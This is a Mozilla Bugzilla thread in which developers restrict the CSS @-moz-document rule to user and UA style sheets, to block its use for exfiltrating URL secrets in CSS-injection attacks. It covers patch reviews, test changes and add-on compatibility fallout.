Closed Bug 1035091 Opened 10 years ago Closed 7 years ago

limit @-moz-document to user and UA sheets (Makes it useless for exfiltration in CSS-injection attacks)

Categories

(Core :: CSS Parsing and Computation, defect)

defect
Not set
normal

Tracking

()

RESOLVED FIXED
mozilla59
Tracking Status
firefox59 --- fixed

People

(Reporter: freddy, Assigned: emilio, NeedInfo)

References

(Depends on 1 open bug, Blocks 2 open bugs, Regressed 1 open bug)

Details

(Keywords: dev-doc-complete, sec-want, site-compat, Whiteboard: [adv-main59-])

Attachments

(5 files, 13 obsolete files)

51.14 KB, patch
zwol
: review+
Details | Diff | Splinter Review
6.56 KB, patch
heycam
: feedback+
Details | Diff | Splinter Review
49.96 KB, patch
zwol
: review+
zwol
: checkin+
Details | Diff | Splinter Review
2.24 KB, patch
Details | Diff | Splinter Review
59 bytes, text/x-review-board-request
xidorn
: review+
Details
Scriptless attacks (i.e. CSS injections) can be used to leak secret data in the URL (session id, oauth token) to a third party. If we would remove -moz-document completely, this would not be possibly. Alternatively, we could also stop supporting -moz-document for web content. Or we could just remove the regex feature. Explanation of scriptless attacks: http://www.nds.rub.de/research/publications/scriptless-attacks/
If this attack is a serious threat, I'd be ok with restricting @-moz-document to user and UA style sheets. That said, isn't the attack only present when sites that should be doing input sanitizing before including user-provided content in their page are either not doing it or doing it using an approach other than a whitelist-based one?
I think this attack is bad enough that we should think about reducing the threat. AFAIU -moz-document was considered for CSS3 but did not make it. It doesn't seem there are any plans to bring it up again. The attack *does* require a style injection on a web page, but I think this is a weaker assumption than a needing script injection (XSS).
(In reply to Frederik Braun [:freddyb] from comment #2) > AFAIU -moz-document was considered for CSS3 but did not make it. It was dropped because I (as the editor of the spec) proposed dropping it because it wasn't clear to me what the right way to specify URL equality was (what normalizations are and are not performed, etc.), and because I wanted to advance the other features in the spec faster. > It doesn't > seem there are any plans to bring it up again. I don't think that's the case.
(That's as proposed in http://lists.w3.org/Archives/Public/www-style/2012Aug/0749.html at resolved in http://lists.w3.org/Archives/Public/www-style/2012Oct/0275.html ; it's currently commented out in the spec source rather than removed, with the comments noting that it's planned for Level 4.)
(In reply to Frederik Braun [:freddyb] from comment #2) > The attack *does* require a style injection on a web page, but I think this > is a weaker assumption than a needing script injection (XSS). I'd also like to get a better understanding of what assumptions we're making about style injection. What do we expect developers to do and not to do when sanitizing CSS from untrusted sources to include in their Web content?
Keywords: sec-want
Summary: make -moz-document useless for scriptless attacks → Make -moz-document useless for exfiltration in CSS-injection attacks
Thanks for providing the context with the specification status, David! (In reply to David Baron [:dbaron] (UTC-7) (needinfo? for questions) from comment #6) > I'd also like to get a better understanding of what assumptions we're making > about style injection. What do we expect developers to do and not to do > when sanitizing CSS from untrusted sources to include in their Web content? There aren't as many CSSSanitizers as there are for HTML/JS. Google-caja just removes styles and leaves those in given by a whitelist (default here https://code.google.com/p/google-caja/source/browse/trunk/src/com/google/caja/plugin/sanitizecss.js#370) The most common things sanitizer currently look out for are exrpressions (legacy IE directive to execute JavaScript from styles) and moz-binding (not available for web content anymore), (cf. https://code.google.com/p/google-caja/wiki/AttackVectors) The current rationale in the security community is that injected CSS can not harm the user as much as injected scripts do. My understanding is that -moz-document poses a surprise here.
I'm fine with limiting @-moz-document to user and UA sheets for now.
Summary: Make -moz-document useless for exfiltration in CSS-injection attacks → limit @-moz-document to user and UA sheets (Makes it useless for exfiltration in CSS-injection attacks)
David, I know my way around the code base but I'm not sure whether I can take this one (I never touched Document/CSS things). If there are similar bugs to this one, I can still give it a try. If you think that this isn't a good second bug - Can you help us find an owner for this?
Status: UNCONFIRMED → NEW
Ever confirmed: true
Flags: needinfo?(dbaron)
This is a perfectly fine second bug. The one tricky bit is that I don't think either of the existing mUnsafeRulesEnabled or mIsChromeOrCertifiedApp booleans in the CSS parser will match what's needed here, so you'd need to add a mechanism for the CSS parser to know whether it's parsing a UA or user sheet rather than an author sheet. (It's possible that the boolean aAllowUnsafeRules could be changed to an nsStyleSet::sheetType.)
Flags: needinfo?(dbaron)
I'm new to the CSS code, so here's my understanding of the code and the interpretation of your suggestion. Please correct me if I'm wrong. A sheet parser is being told whether it should allow specific CSS rules depending on the current context. This happens in CSSParserImpl::ParseSheet, which gets aAllowUnsafeRules as a bool parameter (this sets mUnsafeRulesEnabled). mUnsafeRulesEnabled is then used to reject selective tokens in CSS properties and selectors. So the suggestion is to rewrite the function declaration of ParseSheet to accept a sheetType instead of the boolean "aAllowUnsafeRules". Would this mean removing mUnsafeRulesEnabled completely or just overwriting it with something based on the incoming sheet type? If yes, I'm not sure what the decision tree would look like.
Flags: needinfo?(dbaron)
(In reply to Frederik Braun [:freddyb] from comment #11) > Would this mean removing mUnsafeRulesEnabled completely or just overwriting > it with something based on the incoming sheet type? If yes, I'm not sure > what the decision tree would look like. Removing it completely, and probably replacing its uses with an inline function AllowUnsafeRules() that tests whether the mSheetType == eAgentSheet. I didn't look at the callers to see whether this actually is a sensible thing to do, so it might not be. But if it turns out to be easy then it's probably the right approach; if it's not we should find an alternative. Also note that bug 1011738 is changing the same code.
Flags: needinfo?(dbaron)
I'll give it a try.
Assignee: nobody → fbraun
We should really try to do this. Sites are sending us Firefox-only CSS using this stuff, and it's often broken (e.g. see bug 1172991). Frederik, are you still working on this?
Flags: needinfo?(fbraun)
If this is going undone for lack of anyone to do it, I might be able to free up some time to do it.
Sorry, I am unlikely to find the time before I go on paternity leave in July. Unassigning myself. I would be delighted if you could take this, Zack.
Flags: needinfo?(fbraun)
Assignee: fbraun → nobody
Assigning to self so I don't lose it. Expect a patch early next week unless this turns into one of those things where you pull a thread and the entire sweater unravels, which it seems to be my fate to pick those bugs. :-/
Assignee: nobody → zackw
Status: NEW → ASSIGNED
This is, in fact, a medium-sized mess. First off, none of the objects associated with a single style sheet appears to carry the sheet type. Right now, that's strictly a nsStyleSet datum. mIsChromeOrCertifiedApp does not correspond to any style sheet type as far as I can tell. It is currently being set true by CSSParserImpl::ParseSheet (and _only_ ParseSheet) if and only if dom::IsChromeURI(aSheetURI) || aSheetPrincipal->GetAppStatus() == nsIPrincipal::APP_STATUS_CERTIFIED; mUnsafeRulesEnabled is much more complicated. It is set true, again, by CSSParserImpl::ParseSheet and _only_ ParseSheet, if the aAllowUnsafeRules argument to that function is true. This happens in two contexts: * called from CSSStyleSheet::ParseSheet, when the sheet principal is the system principal; * called from css::Loader::ParseSheet, when aLoadData->mAllowUnsafeRules is true. SheetLoadData::mAllowUnsafeRules can become true when the load data is created by css::Loader::LoadChildSheet and the parent sheet already has load data and its mAllowUnsafeRules is true, or when the load data is created by css::Loader::InternalLoadNonDocumentSheet and the aAllowUnsafeRules argument to _that_ is true. (Note inconsistency: sheets @imported from a privileged sheet created by css::Loader::InternalLoadNonDocumentSheet will have mAllowUnsafeRules true, but sheets @imported from a privileged sheet created by CSSStyleSheet::ParseSheet will _not_, because in the latter case, the parent sheet has no load data.) InternalLoadNonDocumentSheet is called with aAllowUnsafeRules true only when css::Loader::LoadSheetSync (4-arg overload) is called with aAllowUnsafeRules true. The 4-arg form of LoadSheetSync is called all over the damn place. It does not appear, on a skim, that "aAllowUnsafeRules true" is equivalent to "sheet principal is the system principal" _or_ to "the sheet type is eAgentSheet." (Note that the _other_ boolean argument to LoadSheetSync says whether to use the system principal for the sheet.) ---- There are also a distressingly large number (i.e. "at least two, maybe more") places that load sheets that are considered to be "user" sheets. However, those that I found (nsLayoutStylesheetCache::InitFromProfile and nsStyleSheetService::LoadAndRegisterSheet, the latter of which doesn't appear to be used in-tree -- is it just for extensions?) consistently go through LoadSheetSync with aAllowUnsafeRules=false and aUseSystemPrincipal=true. So possibly a way forward is to change LoadSheetSync and then propagate the API change in both directions. I have to think some more about that. I don't presently see a good way to subsume mIsChromeOrCertifiedApp into this scheme since its current semantics are decidedly not context-aware. ---- Finally, what-all is this currently being *used* for? mUnsafeRulesEnabled enables: * Properties with CSS_PROPERTY_ALWAYS_ENABLED_IN_UA_SHEETS, all of which can also be exposed to content via prefs: (layout.css.vertical-text-enabled) block-size border-block-end border-block-end-color border-block-end-style border-block-end-width border-block-start border-block-start-color border-block-start-style border-block-start-width inline-size margin-block-end margin-block-start max-block-size max-inline-size min-block-size min-inline-size offset-block-end offset-block-start offset-inline-end offset-inline-start padding-block-end padding-block-start text-combine-upright text-orientation writing-mode (layout.css.object-fit-and-position.enabled): object-fit object-position (layout.css.overflow-clip-box.enabled): overflow-clip-box * The script-level and math-display properties; I *think* these are handled separately from the CSS_PROPERTY_ALWAYS_ENABLED_IN_UA_SHEETS mechanism because that would require exposing a pref to turn them on for content. (Comments suggest that misuse of these can violate rule node invariants.) * Pseudo-elements and pseudo-classes for which PseudoElementIsUASheetOnly / PseudoClassIsUASheetOnly, respectively, are true. There is no way to expose these to content via prefs. :-moz-native-anonymous ::-moz-number-wrapper ::-moz-number-text ::-moz-number-spin-box ::-moz-number-spin-up ::-moz-number-spin-down * All the pseudo-elements for which GetPseudoType returns ePseudo_AnonBox, which I think is equivalent to "everything in nsCSSAnonBoxList.h". Again, there is no way to expose these to content via prefs. mIsChromeOrCertifiedApp enables: * Properties with CSS_PROPERTY_ALWAYS_ENABLED_IN_CHROME_OR_CERTIFIED_APP, which can be exposed to content via prefs: (layout.css.will-change.enabled) will-change
OK, that turned out not to be that bad after all -- I think I spent more time on the tests than anything else. Try server running: https://treeherder.mozilla.org/#/jobs?repo=try&revision=27be88ae310d
This patch changes the CSS parser and loader APIs to distinguish user style sheets from UA and normal ("author") sheets. It uses nsIStyleSheetService's constants for this. (There are *three* other definitions of constants that could be used: in nsIDocument, in nsIDOMWindowUtils, and in nsStyleSet. I just picked one arbitrarily. I do not have time to go on a refactoring rampage, alas.) This patch should cause absolutely no behavioral changes.
Attachment #8622010 - Flags: review?(cam)
And this patch turns off @-moz-document in author sheets. The bulk of it is rejiggering test cases so they still work. I had a bunch of notes on what changed and why, but I cleverly closed that scratchpad before posting :-( The basic idea is, any test that wants to do anything with @-moz-document has to have chrome privileges so it can use nsIDOMWindowUtils.loadSheet to load a user style sheet that will go away with the document. It was convenient to throw them all in layout/style/test/chrome. A small number of tests were dropped without replacement -- these were trying to do things for which there is no equivalent, like use @-moz-document in <style scoped>. Since this used to work and we know people were trying to use it as a browser discriminator, I added a specific error message for @-moz-document in an author sheet.
Attachment #8622011 - Flags: review?(cam)
Oh, the other non-obvious thing about the test suite changes: It is now impossible to use the CSSOM to create a @-moz-document rule. This is because the parser entry points that back CSSOM mutations always parse the new construct as if it were in an author style sheet; it doesn't matter what the sheet being modified is. Changing that would be a much larger and more invasive project.
Argh. Mercurial has mysteriously stopped showing "unknown" files by default in "hg st". This caused me to forget to add two new test files, which in turn caused mach to throw all its toys out of the pram. New try server run: https://treeherder.mozilla.org/#/jobs?repo=try&revision=92005e16c12e
Attachment #8622011 - Attachment is obsolete: true
Attachment #8622011 - Flags: review?(cam)
Attachment #8622012 - Flags: review?(cam)
Testing revealed some small problems with both patches; this revision addresses them. In this patch, the only change from the original is using MOZ_CRASH instead of MOZ_ASSERT in an impossible default case of a switch, so that the compiler does not give a spurious used-uninitialized warning in opt builds.
Attachment #8622010 - Attachment is obsolete: true
Attachment #8622010 - Flags: review?(cam)
Attachment #8622081 - Flags: review?(cam)
The only change in this version of this patch is to tests, but there's an actual problem which needs to be addressed. editor/libeditor/tests/test_bug520189.html tests, among other things, that a @-moz-document rule in a <style> pasted into a contenteditable does not survive sanitization. I assumed that this would continue working and did not test it locally. It does technically still work, but it hits an edge case in the sanitizer which makes the test fail. Before the patch, the CSS parser recognizes the @-moz-document rule and gives the sanitizer a style sheet object containing one rule. The sanitizer then throws away that rule as it's not on its whitelist, so the modified document ends up with an empty <style> tag, which is what the test case looks for. After the patch, the CSS parser does not recognize the @-moz-document rule so it gives the sanitizer a style sheet object containing *zero* rules. This causes the sanitizer to use the original pasted text as the contents of the <style> tag. The sanitization still works in that the @-moz-document rule has no effect, but the test is looking at the contents of the <style> so it fails. For now I just flipped the sense of the two subtests that fail. I am pinging Ehsan re what the sanitizer should actually *do* in this case, and I propose to file a follow-up bug about that.
Flags: needinfo?(ehsan)
Attachment #8622082 - Flags: review?(cam)
Attachment #8622012 - Attachment is obsolete: true
Attachment #8622012 - Flags: review?(cam)
Try server runs for the current set of patches: https://treeherder.mozilla.org/#/jobs?repo=try&revision=604a39bf2d4d # part 1 only https://treeherder.mozilla.org/#/jobs?repo=try&revision=8c29d947f028 # part 1+2 These results look good to me.
I wonder if we shouldn't be allowing add-ons to load sheets with unsafe rules enabled (= AGENT_SHEET type, after these patches), since that allows them to mess with the MathML-related properties.
Comment on attachment 8622081 [details] [diff] [review] Patch 1/2 v1a: distinguish UA, user, author sheets in the CSS loader, parser API Review of attachment 8622081 [details] [diff] [review]: ----------------------------------------------------------------- I think it's a bit confusing that we're using constants like "AUTHOR_SHEET" that imply the level that the sheet will be inserted into the style set. For some APIs, like the style sheet service, we always enable the set of features according to the level we're asked to parse and insert the sheet into, but there are a number of cases where we're parsing with author sheet features enabled but adding the sheet at the agent level. So I think we want to describe the set of features that are enabled. What do you think about having an enum with names like eAgentSheetFeatures, eUserSheetFeatures, eAuthorSheetFeatures, and using that for the Loader/nsCSSParser arguments? r=me if you agree and do this, plus the one nit below. ::: dom/base/nsDocument.cpp @@ +4426,5 @@ > > + unsigned long loaderType; > + switch (aType) { > + case nsIDocument::eAgentSheet: > + loaderType = nsIStyleSheetService::AGENT_SHEET; break; Per the style guide, please indent case labels by a level. Would rather the break statements on their own lines, too. (I was going to suggest using the nsIDocument constants would have been better, since then we could use an enum in various places rather than a plain integer, but giving nsCSSParser a dependency on nsIDocument probably isn't great.) ::: dom/xbl/nsXBLPrototypeResources.cpp @@ +93,5 @@ > > nsRefPtr<CSSStyleSheet> newSheet; > if (IsChromeURI(uri)) { > + // XXX Should this be parsed as an agent sheet (allowed to style > + // anon boxes, etc)? Can't think of a reason to allow this. ::: layout/base/nsDocumentViewer.cpp @@ +2254,5 @@ > baseURI); > if (!uri) continue; > > + // XXX Should this be parsed as an agent sheet (allowed to style > + // anon boxes, etc)? Yeah, no idea who if anyone is using usechromesheets="". Probably best to leave this as USER_SHEET.
Attachment #8622081 - Flags: review?(cam) → review+
Comment on attachment 8622082 [details] [diff] [review] Patch 2/2 v1a: disable @-moz-document in author sheets Review of attachment 8622082 [details] [diff] [review]: ----------------------------------------------------------------- ::: layout/style/test/test_css_eof_handling.html @@ -191,5 @@ > - { > - name: "@-moz-document 2", > - ref: "@-moz-document domain('example.com') { p {} }", > - tst: "@-moz-document domain('example.com') { p {" > - } These test_css_eof_handling.html subtests didn't seem to get added to the new chrome tests. Was that deliberate?
Attachment #8622082 - Flags: review?(cam) → review+
(In reply to Zack Weinberg (:zwol) from comment #25) > Created attachment 8622082 [details] [diff] [review] > Patch 2/2 v1a: disable @-moz-document in author sheets > > The only change in this version of this patch is to tests, but there's an > actual problem which needs to be addressed. > editor/libeditor/tests/test_bug520189.html tests, among other things, that a > @-moz-document rule in a <style> pasted into a contenteditable does not > survive sanitization. I assumed that this would continue working and did > not test it locally. It does technically still work, but it hits an edge > case in the sanitizer which makes the test fail. > > Before the patch, the CSS parser recognizes the @-moz-document rule and > gives the sanitizer a style sheet object containing one rule. The sanitizer > then throws away that rule as it's not on its whitelist, so the modified > document ends up with an empty <style> tag, which is what the test case > looks for. > > After the patch, the CSS parser does not recognize the @-moz-document rule > so it gives the sanitizer a style sheet object containing *zero* rules. > This causes the sanitizer to use the original pasted text as the contents of > the <style> tag. The sanitization still works in that the @-moz-document > rule has no effect, but the test is looking at the contents of the <style> > so it fails. > > For now I just flipped the sense of the two subtests that fail. I am > pinging Ehsan re what the sanitizer should actually *do* in this case, and I > propose to file a follow-up bug about that. I think this is fine, but please add a comment to the test explaining that even though @-moz-document is not filtered away, it's safe as it won't have any effect.
Flags: needinfo?(ehsan)
Blocks: 1177533
Blocks: 1177538
(In reply to Cameron McCormack (:heycam) from comment #27) > I wonder if we shouldn't be allowing add-ons to load sheets with unsafe > rules enabled (= AGENT_SHEET type, after these patches), since that allows > them to mess with the MathML-related properties. That might turn out to have nasty compat implications, but yeah. Filed bug 1177533. (In reply to Cameron McCormack (:heycam) from comment #28) > I think it's a bit confusing that we're using constants like "AUTHOR_SHEET" > that imply the level that the sheet will be inserted into the style set. > For some APIs, like the style sheet service, we always enable the set of > features according to the level we're asked to parse and insert the sheet > into, but there are a number of cases where we're parsing with author sheet > features enabled but adding the sheet at the agent level. > > So I think we want to describe the set of features that are enabled. What > do you think about having an enum with names like eAgentSheetFeatures, > eUserSheetFeatures, eAuthorSheetFeatures, and using that for the > Loader/nsCSSParser arguments? Good point. I put the enum in Loader.h, which is also a much more convenient header for the various places that need it to find it in. And being a real enum, it shook out a number of places where I'd flubbed the conversion. This does mean we now have *four* sets of constants related to "what kind of sheet is this?" but that's a follow-up bug, I think. (Filed bug 1177358.) > > + unsigned long loaderType; > > + switch (aType) { > > + case nsIDocument::eAgentSheet: > > + loaderType = nsIStyleSheetService::AGENT_SHEET; break; > > Per the style guide, please indent case labels by a level. Would rather the > break statements on their own lines, too. Done. > > + // XXX Should this be parsed as an agent sheet (allowed to style > > + // anon boxes, etc)? > Can't think of a reason to allow this. OK, I have removed the comment. > ::: layout/base/nsDocumentViewer.cpp > @@ +2254,5 @@ > > baseURI); > > if (!uri) continue; > > > > + // XXX Should this be parsed as an agent sheet (allowed to style > > + // anon boxes, etc)? > > Yeah, no idea who if anyone is using usechromesheets="". Probably best to > leave this as USER_SHEET. Ditto.
(In reply to Cameron McCormack (:heycam) from comment #29) > @@ -191,5 @@ > > - { > > - name: "@-moz-document 2", > > - ref: "@-moz-document domain('example.com') { p {} }", > > - tst: "@-moz-document domain('example.com') { p {" > > - } > > These test_css_eof_handling.html subtests didn't seem to get added to the > new chrome tests. Was that deliberate? Yes, it is my opinion that other tests adequately cover this case (in particular, the very similar tests for @media). (In reply to Ehsan Akhgari (not reviewing patches, not reading bugmail, needinfo? me!) from comment #30) > (In reply to Zack Weinberg (:zwol) from comment #25) > > For now I just flipped the sense of the two subtests that fail. I am > > pinging Ehsan re what the sanitizer should actually *do* in this case, and I > > propose to file a follow-up bug about that. > > I think this is fine, but please add a comment to the test explaining that > even though @-moz-document is not filtered away, it's safe as it won't have > any effect. I thought about it some more and I have changed these to todo_is() with the original sense, and filed bug 1177546 on the "what should this actually do?" aspect.
Try server run in progress: https://treeherder.mozilla.org/#/jobs?repo=try&revision=86cc858d4df4 Earlier mention of bug 1177358 should read bug 1177538; at least I got it right in the actual dependency tree.
Try server is green, so here is the revised patchset. 1/2 changed enough to be worth checking over once more, I think.
Attachment #8622081 - Attachment is obsolete: true
Attachment #8626392 - Flags: review?(cam)
Only change to this one is as discussed in comment 32, carrying r=cam forward.
Attachment #8622082 - Attachment is obsolete: true
Attachment #8626394 - Flags: review+
I'd like to see this land sooner rather than later -- any progress on the review, or should I take it over?
Flags: needinfo?(cam)
I planned to look at this next week.
Comment on attachment 8626392 [details] [diff] [review] Patch 1/2 v2: distinguish UA, user, author sheets in the CSS loader, parser API Review of attachment 8626392 [details] [diff] [review]: ----------------------------------------------------------------- This looks great. Thanks for cleaning this up! The comment on the SheetParsingMode enum is particularly helpful. ::: layout/style/Loader.cpp @@ +223,5 @@ > + // are not safe for use on the public Web but necessary in UA sheets > + // and/or useful in user sheets. The only values stored in this > + // field are 0, 1, and 2; three bits are allocated to avoid issues > + // should the enum type be signed. > + SheetParsingMode mParsingMode : 3; That's annoying. And using a sized enum, like |enum SheetParsingMode : uint8_t|, results in compiler warnings about the enum not fitting in a bitfield smaller than 8 bits wide. Oh well.
Attachment #8626392 - Flags: review?(cam) → review+
Flags: needinfo?(cam)
The patches needed minor fixups to apply to current trunk. There are no substantive changes. I will land these after -inbound reopens.
Attachment #8626392 - Attachment is obsolete: true
Attachment #8656119 - Flags: review+
Attachment #8656120 - Flags: review+
https://hg.mozilla.org/integration/mozilla-inbound/rev/f6e98029d1cb3b7f40dd427802f98223f9c2e419 Bug 1035091 part 1: change CSS parser and loader APIs to distinguish UA, user, and author sheets instead of just UA vs everyone else. r=heycam https://hg.mozilla.org/integration/mozilla-inbound/rev/1fc07bdd9aa8d04a50c5f77956638bc452df45c5 Bug 1035091 part 2: disable @-moz-document in author sheets. r=heycam
Depends on: 1201420
Status: ASSIGNED → RESOLVED
Closed: 9 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla43
I have added everyone from bug 1201420 to the cc: list of this bug so we can work out how best to proceed. I did some debugging on a trunk build with the existing patches reapplied and Classic Theme Restorer installed. It turns out that nsIStyleSheetService::loadAndRegisterSheet(AGENT_SHEET) *does* cause the sheet to be parsed in agent-sheet mode (as it always did). That leaves us with two bugs, one easy and one hard. The easy bug, which IIUC affects Stylish and maybe others, but *not* CTR, is that ::loadAndRegisterSheet(AUTHOR_SHEET) used to produce a sheet in which @-moz-document was available (but not the special box pseudo selectors and so on). Since loadAndRegisterSheet is used exclusively by addons, we can preserve backward compatibility for that case by treating all such sheets as *user* sheets for parsing. The hard bug, which affects CTR, is: CTR loads chrome://classic_theme_restorer/content/overlay.css, containing @-moz-document rules, from its .../overlay.xul with a <?xml-stylesheet?> directive. *That* sheet was formerly being processed as an *agent* sheet but has now been demoted all the way to an author sheet. This is exactly the case that Cameron was worried about (bug 1201420 comment 24): > Hopefully it is OK to disable @-moz-document in style sheets loaded through > means that content pages have, like <?xml-stylesheet?>, <link>, and <style>, > even if those nodes are inserted into the document by an add-on, since > there's not going to be a way to tell that these nodes were inserted by an > add-on. Then, for all style sheets loaded through the style sheet service > (which I think captures those loaded through the catalog manager too?), > @-moz-document can be enabled, regardless of whether AGENT_SHEET, USER_SHEET > or AUTHOR_SHEET is used. I am wondering whether we maybe *can* cause <?xml-stylesheet?>, <link>, and <style> to load agent sheets (not in terms of the cascade, just the parsing mode) when they are invoked from chrome XUL. I am not sure how to *know* whether the parent document is chrome XUL, though. (The SheetLoadData object for this style load has its mLoaderPrincipal set to the system principal, but mUseSystemPrincipal is false; it should be possible to get to the document object from mOwningElement but I don't know how.) This might still break add-ons that inject style nodes into *content* documents but I think those have better alternatives. It's my understanding of the discussion in 1201420 that there aren't good alternatives for add-ons that want to style the chrome.
Slight correction: I misread the code in style/Loader.cpp. Sheets loaded from <?xml-stylesheet?> have always been treated as author sheets (before the patch: mUnsafeRulesEnabled = false), so again it's only the behavior of @-moz-document that has changed.
This might be a fix for the issues found in bug 1201420. I've developed it as a separate patch for ease of review but I would squash it into patch 1/2 for landing. This change has undergone only cursory testing, viz. the *obvious* glitches in Minefield+CTR were gone after adding this patch. Once try builds are available, I would appreciate it if authors of affected add-ons could test out their work in those builds, to make sure we didn't miss anything. I would also appreciate assistance in writing some new test cases which would have caught this regression. As I said, I know next to nothing about add-on development; moreover I know nothing at all about testing add-ons in tree.
(In reply to Zack Weinberg (:zwol) from comment #44) > Since loadAndRegisterSheet is used exclusively by addons, we can > preserve backward compatibility for that case by treating all such sheets as > *user* sheets for parsing. To confirm, is this only in parsing mode and not in the cascade as well? > CTR loads > chrome://classic_theme_restorer/content/overlay.css, containing > @-moz-document rules, from its .../overlay.xul with a <?xml-stylesheet?> > directive. That just happens to use the same file to style two different documents using separate @-moz-document blocks. I think it would be fairly simple to split overlay.css and all the overlayextra.css's (imported) each into two separate files, one with the main window's declarations to be loaded there, and another for CTR's options dialog declarations. The @-moz-document's could be safely removed then. The common parts (very little code) could either be appended to both sheets, or loaded separately in a third sheet through a new xml-stylesheet node. Aris, am I way off? :) (Only the "style chrome://global/content/customizeToolbar.xul[...]" in chrome.manifest would be left, which I don't think that sheet is doing much for already though.) Both approaches (letting nodes-loaded sheets use @-moz-document and splitting CTR's files) would be backwards compatible, both imply some work... Only the latter seems to fall more into dbaron's words from bug 1201420 comment 1: "[...]I'd like what we do for Chrome not to diverge unnecessarily from the Web[...]". This all to say: > I am wondering whether we maybe *can* cause <?xml-stylesheet?>, <link>, and > <style> to load agent sheets (not in terms of the cascade, just the parsing > mode) when they are invoked from chrome XUL. IMO if it turns out it needs too much work to do this, it might not be worth pursuing. To style multiple content documents with the same external stylesheet you're much better off using the stylesheet service. To do the same for chrome documents is also probably easier through the service, but using nodes is also possible, as in the CTR example above. Otherwise, I certainly won't oppose. :) (This only applies to *external* and *constantly* loaded sheets only! Not to dynamically built data: strings sheets or those that need to be enabled/disabled at will as discussed in bug 1201420!) > I would also appreciate assistance in writing some new test cases which > would have caught this regression. As I said, I know next to nothing about > add-on development; moreover I know nothing at all about testing add-ons in > tree. I'm not an expert on tests myself (at all!), but I believe in this case you could test these regressions as if they happened in native firefox/toolkit stylesheet usage. From all this discussion, I got the impression neither the stylesheet service nor the xml-stylesheet/style/link nodes discriminate for what calls/adds them. Did I get it wrong? So, something like creating a few different sheets, some with @-moz-documents, some not, which change the visibility of a hidden object. Then verify those cases where the box would be visible (have dimensions) and those where it would not, according to (dis)allowed @-moz-document usage. Bug 1201420 comment 20 seems like a good starting point, unless that was actually unrelated.
If using code for two documents (browser.xul, options.xul) in one overlay is the main problem here, I can of course split it like Luís suggested. It was on my to do list anyway. ;-) The "chrome://global/content/customizeToolbar.xul" is not even used by Fx29+ anymore, right? I guess it can be removed too. So next CTR build will split the overlay.css and get rid of the "@-moz-document" there and also remove the "customizeToolbar.xul" reference. Will this make things easier?
Updating the flag as the patches have been backed out.
Will this fix also address the issue of bug #1209452 (i.e. an extension can inject CSS to hide itself from list of extensions available at about:addons or Add-on Manager). Thanks.
(In reply to Daniel Kabs, reporting bugs since 2002 from comment #51) > Will this fix also address the issue of bug #1209452 (i.e. an extension can > inject CSS to hide itself from list of extensions available at about:addons > or Add-on Manager). Thanks. No. For one the stylesheet service should be unaffected (according to the conclusions of all the discussion, unless I misread something?). Although even if that wasn't the case, it'd be a simple fix for the add-on to get around that.
Rebased patch on current trunk.
Attachment #8656119 - Attachment is obsolete: true
Attachment #8673078 - Flags: review+
Rebased patch on current trunk (no changes required).
Attachment #8656120 - Attachment is obsolete: true
Attachment #8673079 - Flags: review+
Rebased patch on current trunk (no changes required).
Attachment #8673080 - Flags: feedback?(cam)
Sorry for dropping the ball on this. I'm back to fulltime on my research and have extremely limited time for Mozilla hacking. I need significant help from y'all to get this finished. 1) Test builds with the latest patches are available from https://ftp.mozilla.org/pub/mozilla.org/firefox/try-builds/zackw@panix.com-e63594b7a815/ . Everyone with an add-on affected by bug 1201420, please test your add-on thoroughly with these builds. If you're tagged as +needinfo on this bug and you're not Cameron, that means I know you have an affected add-on. Try builds are deleted after a relatively short interval, so please do this soon. 2) I said in comment 47 that "I would appreciate assistance writing test cases that would have caught this regression." I was insufficiently blunt. *I need someone to write those test cases for me.* I do not have time to do it myself even if I already knew how, which I don't. 3) I am considering re-landing patch 1 of this series. It has no user- nor add-on-visible effect by itself, but it changes a bunch of internal C++ APIs around, and required quite a bit of work to update to the current tree. If it were landed by itself that would reduce the amount of scutwork involved in dusting this bug off every couple weeks. Cameron: your thoughts on that?
Flags: needinfo?(cam)
Flags: needinfo?(aris-addons)
Flags: needinfo?(garyshap)
Flags: needinfo?(quicksaver)
Flags: needinfo?(jason.barnabe)
Current CTR (1.4.1) and the above 'try builds' work fine. Tested Win 32 & 64 builds.
Flags: needinfo?(aris-addons)
My add-ons are also fine with the try build.
Flags: needinfo?(quicksaver)
(In reply to Kohei Yoshino [:kohei] from comment #60) > Added the site compatibility doc: > https://www.fxsitecompat.com/en-US/docs/2015/moz-document-support-has-been- > dropped/ Whoa whoa, we haven't landed the patch again. Could you rephrase that to indicate that we *plan* to do this but there isn't a definite timeframe yet?
I'll update the doc if the patch could not be landed to 44 by any chance.
(In reply to Zack Weinberg (:zwol) from comment #57) > 3) I am considering re-landing patch 1 of this series. It has no user- nor > add-on-visible effect by itself, but it changes a bunch of internal C++ APIs > around, and required quite a bit of work to update to the current tree. If > it were landed by itself that would reduce the amount of scutwork involved > in dusting this bug off every couple weeks. Cameron: your thoughts on that? I'm not Cameron, but you should go ahead and land it.
Flags: needinfo?(cam)
(In reply to David Baron [:dbaron] ⌚UTC-7 from comment #63) > (In reply to Zack Weinberg (:zwol) from comment #57) > > 3) I am considering re-landing patch 1 of this series. > I'm not Cameron, but you should go ahead and land it. OK, it will be pushed to inbound shortly. I had to fix merge conflicts *again*, not eight hours later, so here's yet another revision.
Attachment #8657619 - Attachment is obsolete: true
Attachment #8673078 - Attachment is obsolete: true
Attachment #8673341 - Flags: review+
Attachment #8673341 - Flags: checkin+
https://hg.mozilla.org/integration/mozilla-inbound/rev/2416e113e47594b3e5ca403a10b81a4ac37d9400 Bug 1035091 part 1: change CSS parser and loader APIs to distinguish UA, user, and author sheets instead of just UA vs everyone else. r=heycam
... that's new. sorry for the noise, everyone.
Whiteboard: [partially landed, leave open]
Keywords: leave-open
Whiteboard: [partially landed, leave open]
